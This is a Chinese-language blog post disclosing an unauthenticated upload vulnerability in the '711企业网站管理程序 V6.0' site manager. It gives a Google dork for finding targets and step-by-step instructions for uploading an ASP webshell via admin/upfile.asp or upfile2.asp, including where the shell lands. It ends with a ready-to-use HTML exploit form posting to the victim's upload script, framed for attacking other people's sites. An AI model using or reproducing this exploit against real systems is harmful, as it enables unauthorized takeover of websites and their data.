711企业网站管理程序V6.0再爆上传漏洞及利用

前些天出了个Cookies注入漏洞,今天又翻了看了下~  

在ADMIN目录有2个上传文件upfile.asp和upfile2.asp  

这2个组件的功能就是:无需登录后台,无需截包,直接本地修改代码就能上传asp文件,无语中。。。。  

另外,更可爱的是写这套程序的还为我们编写一套可用万能密码直接登录的后台。据谷歌报道,存在此套系统的用户多达1,050,000 。继续无语中。。。  


1,谷歌里写上inurl:List.asp?Shop_ID  
2,如果网站存在以上上传文件,90%能上传asp文件。 
3,将图片123中地址替换成自己检测的网站地址即可 。 
4,在选择图片文件里直接上传asp文件。 (其实能上传任意后缀的文件。) 
5,打开网站首页,寻找图片真实地址。一般shell地址为
http://www.XXX.com/pic/XXXXXX.asp  

罗嗦一句,上传组件不是有2个吗? 一般管理员会修改或者删第一个upfile.asp,第二个也是可以利用的upfile2.asp 


如果测试失败。说明此漏洞已经打上补丁。如果没有打补丁测试失败,引用一段话:在一般情况下,某事物个体发生具有自身特有属性的负面现象,而这种现象无法从科学的角度得到合理的解释,但它又确实存在,我们一般称之为人品问题.(RPWT)”   -----------摘自《辞海》第874页  

EXP: 


<html> 
<head> 
<meta http-equiv="Content-Type" content="text/html; charset=gb2312"> 
<link href="style.css" rel="stylesheet" type="text/css"> 
</head> 
<body leftmargin="0" topmargin="0" bgcolor="#CEDBFF"> 
        <table width="100%" border="0" cellspacing="0" cellpadding="0" align="center"> 
<form name="myform" method="post" action="
http://www.XXXX.com/admin/upfile.asp" enctype="multipart/form-data" language="javascript" οnsubmit="return check();"> 
          <tr align="center" valign="middle">  
            <td height="15" align="left"> 选择图片:  
              <input type="file" name="file1" value=""> <input type="submit" value="上传" name="B1" class="txt " isshowprocessbar="True"></td> 
          </tr> 
      </form> 
        </table> 
</body> 
</html>

  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值